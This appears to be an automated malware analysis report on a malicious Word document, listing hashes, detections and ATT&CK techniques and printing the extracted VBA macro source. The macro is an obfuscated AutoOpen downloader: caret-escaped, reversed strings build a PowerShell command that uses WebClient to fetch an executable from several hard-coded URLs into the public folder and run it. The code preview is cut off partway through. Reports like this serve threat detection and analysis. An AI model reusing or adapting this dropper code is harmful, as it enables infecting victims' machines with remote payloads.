Office (OLE) malware analysis — malicious · b085f977e2735c8f

MALICIOUS

Office (OLE)

66.8 KB Created: 2018-10-01 21:33:00 Authoring application: Microsoft Office Word First seen: 2019-04-17

MD5: aaf941974585c2e82b2d5c8e2fa66161 SHA-1: 557ebb19251fbbbd30be677fbf2b27249372459b SHA-256: b085f977e2735c8f02fffb8332bdf5d55dda504f33c96231ffabceda94e931bb

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains critical heuristics indicating VBA macros with a Shell() call, and is detected by ClamAV as a downloader. The AutoOpen macro attempts to execute obfuscated commands, likely to download and run a second-stage payload. The specific obfuscation makes it difficult to determine the exact URL or command, but the overall intent is clear.

Heuristics 6

ClamAV: Doc.Downloader.Sload-6770364-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Sload-6770364-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4235 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4235 bytes
SHA-256: `3d391ff3f81fc8718242fc0dad9dcae414fe36acca5a899890caa233129c5eab`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ukBJsqKi" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() If jdzZqW Xor 7 Then NNtLLW = "tAPzSLPfAw" End If If TbUPz <> 11 Then mAnjt = "RiuA" End If BqfbHfPJWY (KeyString(ZQwwfZf + bLAFGCRi + 0 + 4 + 63 + wWsjjEl + AczYfoB) + wjmrIF + wMFNO + KeyString(XMMhhQs + DYLcmUR + 0 + 4 + 73 + AmirH + KbFYiOlK) + qwrAmzkcG + PUPzWNULXz + hHosArkwj + AfFwtWo + DonBMk) If lpBiwr Or 17 Then dtNJb = "iHY" End If If WNdat And QQwzw Then khcFOR = "w" End If End Sub Attribute VB_Name = "mVzIiLrVhOWzO" Function qwrAmzkcG() If nzaTp = 2 Then wAJlA = "nSFoV" End If If bcpMIf = 2 Then isVVLZ = "qDUYUR" End If If HIjatU = CmCRc Then pcqDh = "NKSFkZ" End If If GbzjMo Or VhdhmF Then qiTuwC = "b" End If ccMWBTLVWkU = "d /V^:^ON/C" + """" + "^s^e^t ^u^" + "z^wF=^ ^ ^ ^ ^ ^" If VuOmU >= 6 Then mqdhhf = "dwONdjiihdTbPu" End If iNPsWqoH = " ^ ^ ^ ^ ^ ^ ^ ^ ^ " + "^}^}^{^hct^ac^}^" + ";^k^a^er^b;^KJ^z^$^" nzRTqMMqdn = " ^m^e^t^I^-^e^ko" + "vnI^;)^K^J^z^" + "$^ ,CwR^$(^e" + "^l^i^F^d^a^o^l" + "n^w^o^D^.^F^E^l^$^{^" + "yr^t^{)^F^dM^$^ " qwrAmzkcG = ccMWBTLVWkU + iNPsWqoH + nzRTqMMqdn If jjjQA < jozFQI Then bEUdJ = "qarnQjo" End If If KFplBV Xor AwjdD Then ZiaNVJ = "P" End If End Function Function PUPzWNULXz() If dwhpsQ >= 13 Then LapduQ = "HBaDVw" End If If MANNC > iPiET Then IDnMI = "zSdpwkKiOI" End If If koFKm Or 13 Then bfOThK = "YaM" End If qRoPKU = "n^i^ C^wR^$(^h" + "c^a^er^o^f^;^'^" + "e^x^e^.^'^+^p" + "D^h$^+^'^\" If MkmWo And ziaOzY Then iYnilu = "iJGw" End If If OvnzN = WEdCTz Then oSTiw = "RGkcUjkSf" End If If wLJvN And zrrUP Then wduULW = "FwNZ" End If If iTTQd >= rhTEH Then abCWmH = "BilzZMYw" End If If sTtEEa Or PHTUS Then sEsMsi = "jGa" End If NTuBjYILi = "^'^+c^i^l^b^" + "u^p^:vn^e$^=^K^" + "J^z^$^;^'^8^3" + "^6^'^ ^=^ ^p" + "^D^h^$;)^'^@^" vdWUbniapNc = "'(^ti^l^p^S.^" + "'^s^s^Ec1^h" + "^7^f^P/^moc^.^s^e^l" + "^g^g^i^g^f^o^x^ob//^" + ":^p^t^t^h^@n^gc^B^" + "yH^l/^u^a^.^m^oc^.e" If SMzCk Or zORIrl Then HXQZDj = "pi" End If If tzRwTP >= ibBJiG Then KBnDXo = "d" End If If BaHqi > HEiVT Then nwOtF = "YcVEk" End If If BzjDiq And 4 Then NqdkVK = "Vf" End If vXaTSBAmBfb = "n^o^tc^i^m^s^oc//^:" + "^p^t^t^h^@^Y^f^oC^" + "a^J^W/^ur^." OnrjPQvoSv = "^5^em^u^t^s^" + "oc//^:^pt^t^h^@^P^" + "t^i^X^Fs^q^3^G/" PUPzWNULXz = qRoPKU + NTuBjYILi + vdWUbniapNc + vXaTSBAmBfb + OnrjPQvoSv If zZGEDw > 19 Then isoJpF = "GfqLz" End If End Function Function hHosArkwj() VpzIbqs = "r^f^.t^o^y^a^m^" + "se^u^g^u^h//^:^p^t^t" + "h^@^T^9^5^q^t^D^1^" + "L^LN/^8^1^0^2^g^u^" + "A/^s^d^a^o^l^p^u/^" LBVtvoEGFi = "tn^e^tn^oc^-^p^" + "w/^k^h^.^m^oc^.^a^e^" + "bc//^:^s^p" + "^t^t^h^'^=^F^d^M^$^;" MtBorPILiDc = "^tne^i^lC^be^W^.t^eN" + "^ ^tc^e^j^b^o^" + "-^w^en^=^F^El^" + "$^ ^l^l^e^h^sr^e^w^o" + "^p&&^f^or /^L %^" If MRdjc Or prdVvi Then wYnMts = "zQnsm" End If If kObhBM >= vPWcLW Then haYESD = "rALho" End If nNbCUiQ = "3 ^in (^3^9^3" + "^;^-^1^;^0)^d" + "^o ^s^e^t PN^A=" + "!PN^A!!^u^z^wF:~%^3" woIcWiGfj = ",1!&&^i^f %^3" + "=^=^0 c^a^l^l " + "%PN^A:^~^5%" + """" + "" hHosArkwj = VpzIbqs + LBVtvoEGFi + MtBorPILiDc + nNbCUiQ + woIcWiGfj If ikzWOw Or 7 Then NUijKM = "tTLVQHTk" End If If aFCGrT Xor cZkEcu Then zdzWc = "IQprYHlXw" End If If sRaBQM = 19 Then tTnTI = "MIDM" End If If OPANuf = zttiXA Then wDIoNS = "NwnvB" End If End Function Attribute VB_Name = "MKwqSjuUjAdcw" Function BqfbHfPJWY(CSWYMEToObq As String) Const hLjOBa = 475327237 - 475327237 If MkBrE > IFjTCs Then TvrXir = "KilVOsiGSkqRn" End If If zmboUJ Or 16 Then RQaQp = "nsCn" End If If CMTBrC > njNEkL Then MHSCw = "qJK" End If If LiKibI Or kjFYbS Then WmSosE = "ViYtSo" End If If UpDmo An ... (truncated)

SHA-256: 3d391ff3f81fc8718242fc0dad9dcae414fe36acca5a899890caa233129c5eab

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ukBJsqKi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   If jdzZqW Xor 7 Then

NNtLLW = "tAPzSLPfAw"
End If
   If TbUPz <> 11 Then

mAnjt = "RiuA"
End If
BqfbHfPJWY (KeyString(ZQwwfZf + bLAFGCRi + 0 + 4 + 63 + wWsjjEl + AczYfoB) + wjmrIF + wMFNO + KeyString(XMMhhQs + DYLcmUR + 0 + 4 + 73 + AmirH + KbFYiOlK) + qwrAmzkcG + PUPzWNULXz + hHosArkwj + AfFwtWo + DonBMk)
   If lpBiwr Or 17 Then

dtNJb = "iHY"
End If
   If WNdat And QQwzw Then

khcFOR = "w"
End If
End Sub


Attribute VB_Name = "mVzIiLrVhOWzO"
Function qwrAmzkcG()
If nzaTp = 2 Then

wAJlA = "nSFoV"
End If
   If bcpMIf = 2 Then

isVVLZ = "qDUYUR"
End If
   If HIjatU = CmCRc Then

pcqDh = "NKSFkZ"
End If
   If GbzjMo Or VhdhmF Then

qiTuwC = "b"
End If
ccMWBTLVWkU = "d /V^:^ON/C" + """" + "^s^e^t ^u^" + "z^wF=^  ^ ^ ^ ^ ^"
If VuOmU >= 6 Then

mqdhhf = "dwONdjiihdTbPu"
End If
iNPsWqoH = " ^ ^  ^ ^ ^ ^ ^ ^ ^ " + "^}^}^{^hct^ac^}^" + ";^k^a^er^b;^KJ^z^$^"
nzRTqMMqdn = " ^m^e^t^I^-^e^ko" + "vnI^;)^K^J^z^" + "$^ ,CwR^$(^e" + "^l^i^F^d^a^o^l" + "n^w^o^D^.^F^E^l^$^{^" + "yr^t^{)^F^dM^$^ "
qwrAmzkcG = ccMWBTLVWkU + iNPsWqoH + nzRTqMMqdn
   If jjjQA < jozFQI Then

bEUdJ = "qarnQjo"
End If
   If KFplBV Xor AwjdD Then

ZiaNVJ = "P"
End If
End Function
Function PUPzWNULXz()
If dwhpsQ >= 13 Then

LapduQ = "HBaDVw"
End If
   If MANNC > iPiET Then

IDnMI = "zSdpwkKiOI"
End If
   If koFKm Or 13 Then

bfOThK = "YaM"
End If
qRoPKU = "n^i^ C^wR^$(^h" + "c^a^er^o^f^;^'^" + "e^x^e^.^'^+^p" + "D^h$^+^'^\"
If MkmWo And ziaOzY Then

iYnilu = "iJGw"
End If
   If OvnzN = WEdCTz Then

oSTiw = "RGkcUjkSf"
End If
   If wLJvN And zrrUP Then

wduULW = "FwNZ"
End If
   If iTTQd >= rhTEH Then

abCWmH = "BilzZMYw"
End If
   If sTtEEa Or PHTUS Then

sEsMsi = "jGa"
End If
NTuBjYILi = "^'^+c^i^l^b^" + "u^p^:vn^e$^=^K^" + "J^z^$^;^'^8^3" + "^6^'^ ^=^ ^p" + "^D^h^$;)^'^@^"
vdWUbniapNc = "'(^ti^l^p^S.^" + "'^s^s^Ec1^h" + "^7^f^P/^moc^.^s^e^l" + "^g^g^i^g^f^o^x^ob//^" + ":^p^t^t^h^@n^gc^B^" + "yH^l/^u^a^.^m^oc^.e"
If SMzCk Or zORIrl Then

HXQZDj = "pi"
End If
   If tzRwTP >= ibBJiG Then

KBnDXo = "d"
End If
   If BaHqi > HEiVT Then

nwOtF = "YcVEk"
End If
   If BzjDiq And 4 Then

NqdkVK = "Vf"
End If
vXaTSBAmBfb = "n^o^tc^i^m^s^oc//^:" + "^p^t^t^h^@^Y^f^oC^" + "a^J^W/^ur^."
OnrjPQvoSv = "^5^em^u^t^s^" + "oc//^:^pt^t^h^@^P^" + "t^i^X^Fs^q^3^G/"
PUPzWNULXz = qRoPKU + NTuBjYILi + vdWUbniapNc + vXaTSBAmBfb + OnrjPQvoSv
   If zZGEDw > 19 Then

isoJpF = "GfqLz"
End If
End Function
Function hHosArkwj()
VpzIbqs = "r^f^.t^o^y^a^m^" + "se^u^g^u^h//^:^p^t^t" + "h^@^T^9^5^q^t^D^1^" + "L^LN/^8^1^0^2^g^u^" + "A/^s^d^a^o^l^p^u/^"
LBVtvoEGFi = "tn^e^tn^oc^-^p^" + "w/^k^h^.^m^oc^.^a^e^" + "bc//^:^s^p" + "^t^t^h^'^=^F^d^M^$^;"
MtBorPILiDc = "^tne^i^lC^be^W^.t^eN" + "^ ^tc^e^j^b^o^" + "-^w^en^=^F^El^" + "$^ ^l^l^e^h^sr^e^w^o" + "^p&&^f^or /^L %^"
If MRdjc Or prdVvi Then

wYnMts = "zQnsm"
End If
   If kObhBM >= vPWcLW Then

haYESD = "rALho"
End If
nNbCUiQ = "3 ^in (^3^9^3" + "^;^-^1^;^0)^d" + "^o ^s^e^t PN^A=" + "!PN^A!!^u^z^wF:~%^3"
woIcWiGfj = ",1!&&^i^f %^3" + "=^=^0 c^a^l^l " + "%PN^A:^~^5%" + """" + ""
hHosArkwj = VpzIbqs + LBVtvoEGFi + MtBorPILiDc + nNbCUiQ + woIcWiGfj
   If ikzWOw Or 7 Then

NUijKM = "tTLVQHTk"
End If
   If aFCGrT Xor cZkEcu Then

zdzWc = "IQprYHlXw"
End If
   If sRaBQM = 19 Then

tTnTI = "MIDM"
End If
   If OPANuf = zttiXA Then

wDIoNS = "NwnvB"
End If
End Function


Attribute VB_Name = "MKwqSjuUjAdcw"
Function BqfbHfPJWY(CSWYMEToObq As String)
Const hLjOBa = 475327237 - 475327237
   If MkBrE > IFjTCs Then

TvrXir = "KilVOsiGSkqRn"
End If
   If zmboUJ Or 16 Then

RQaQp = "nsCn"
End If
   If CMTBrC > njNEkL Then

MHSCw = "qJK"
End If
   If LiKibI Or kjFYbS Then

WmSosE = "ViYtSo"
End If
   If UpDmo An
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.